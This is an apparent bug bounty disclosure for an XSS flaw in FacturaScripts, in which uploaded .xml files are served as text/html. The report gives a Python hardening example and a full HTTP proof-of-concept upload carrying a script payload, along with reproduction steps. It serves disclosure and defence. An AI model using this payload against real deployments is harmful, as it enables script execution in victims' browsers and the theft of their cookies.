Cross-site scripting - Reflected via upload `.xml` file in neorazorx/facturascripts
Valid
Reported on
Apr 30th 2022
Description
When a user uploads a file with the .xml extension and then accesses that file directly, the server responds with Content-Type: text/html, so the browser processes the XML file as an HTML document.
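The root cause above is a download endpoint that returns attacker-controlled content with an HTML content type on the application's own origin. The following Python is an added example, not FacturaScripts code and not the fix from the linked commit: it contrasts the behaviour the report describes with header selection that derives the type from an extension allowlist, forces a download for anything a browser could treat as active content, and disables MIME sniffing. The extension map and the inline-safe set are assumptions chosen for the example.

```python
import re

# Extension -> Content-Type map for this example (an assumption; a real
# application would keep its own allowlist of permitted attachment types).
EXTENSION_TYPES = {
    ".png": "image/png",
    ".jpg": "image/jpeg",
    ".jpeg": "image/jpeg",
    ".gif": "image/gif",
    ".pdf": "application/pdf",
    ".txt": "text/plain",
    ".xml": "application/xml",
    ".svg": "image/svg+xml",
    ".html": "text/html",
}

# Types a browser may show inline without giving uploaded content a script
# execution context. text/html and image/svg+xml are deliberately absent.
INLINE_SAFE_TYPES = {
    "image/png", "image/jpeg", "image/gif", "application/pdf", "text/plain",
}


def _extension(filename: str) -> str:
    idx = filename.rfind(".")
    return filename[idx:].lower() if idx >= 0 else ""


def _header_safe_filename(filename: str) -> str:
    # Keep the Content-Disposition value on one line and free of quotes so
    # the file name cannot break out of the header.
    return re.sub(r"[^\w.\-]", "_", filename)


def vulnerable_download_headers(filename: str) -> dict:
    """Models the behaviour the report describes: every attachment is served
    as text/html, so an uploaded xss.xml containing <script> is parsed as a
    page on the application's origin."""
    return {
        "Content-Type": "text/html",
        "Content-Disposition": f'inline; filename="{_header_safe_filename(filename)}"',
    }


def safe_download_headers(filename: str) -> dict:
    """Pick the type from the allowlist, force a download for anything that
    is not inline-safe, and stop the browser from sniffing a different type."""
    content_type = EXTENSION_TYPES.get(_extension(filename), "application/octet-stream")
    disposition = "inline" if content_type in INLINE_SAFE_TYPES else "attachment"
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'{disposition}; filename="{_header_safe_filename(filename)}"',
        "X-Content-Type-Options": "nosniff",
        # Defence in depth: if a browser still renders the body, the sandbox
        # directive strips script execution and origin privileges.
        "Content-Security-Policy": "sandbox",
    }


def renders_as_html_on_origin(headers: dict) -> bool:
    """Check a reviewer can run over a captured response: an HTML content type
    with an inline disposition is exactly the condition the PoC relies on."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    disp = headers.get("Content-Disposition", "inline").split(";")[0].strip().lower()
    return ctype == "text/html" and disp != "attachment"


if __name__ == "__main__":
    for name in ("xss.xml", "logo.png", "icon.svg"):
        print(name, "vulnerable:", vulnerable_download_headers(name))
        print(name, "hardened:  ", safe_download_headers(name))
```

The allowlist approach matters more than the `.xml` case alone: SVG, HTML and any unknown extension all fall back to a forced download, so a new file type cannot reintroduce the same bug.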
Proof of Concept
POST /facturascripts/EditAttachedFile?code=1&action=save-ok HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------116175579928758251263819370629
Content-Length: 1356
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditAttachedFile?code=1&action=save-ok
Cookie: <web-cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="action"
insert
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="activetab"
EditAttachedFile
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="code"
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="multireqtoken"
99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|4vnVMk
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="path"; filename="xss.xml"
Content-Type: text/xml
<script>alert(window.origin)</script>
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="filename"
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="mimetype"
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="size"
0
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="date"
2022-04-30
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="hour"
17:45:45
-----------------------------116175579928758251263819370629--
Steps to reproduce
- Prepare a file xss.xml with content:
<script>alert(window.origin)</script>
- Upload the xss.xml file in Admin -> Library
- Click download and the XSS fires
Impact
This vulnerability allows arbitrary JavaScript to execute in the victim's browser, which can be used to steal the user's cookies, perform HTTP requests, read the content of same-origin pages, etc.
We are processing your report and will contact the neorazorx/facturascripts team within 24 hours.
a year ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back
a year ago
The researcher's credibility has increased: +7
Fixed here https://github.com/NeoRazorX/facturascripts/commit/31a6b6029cd95b2d64baac3d9209cc15e1f928e8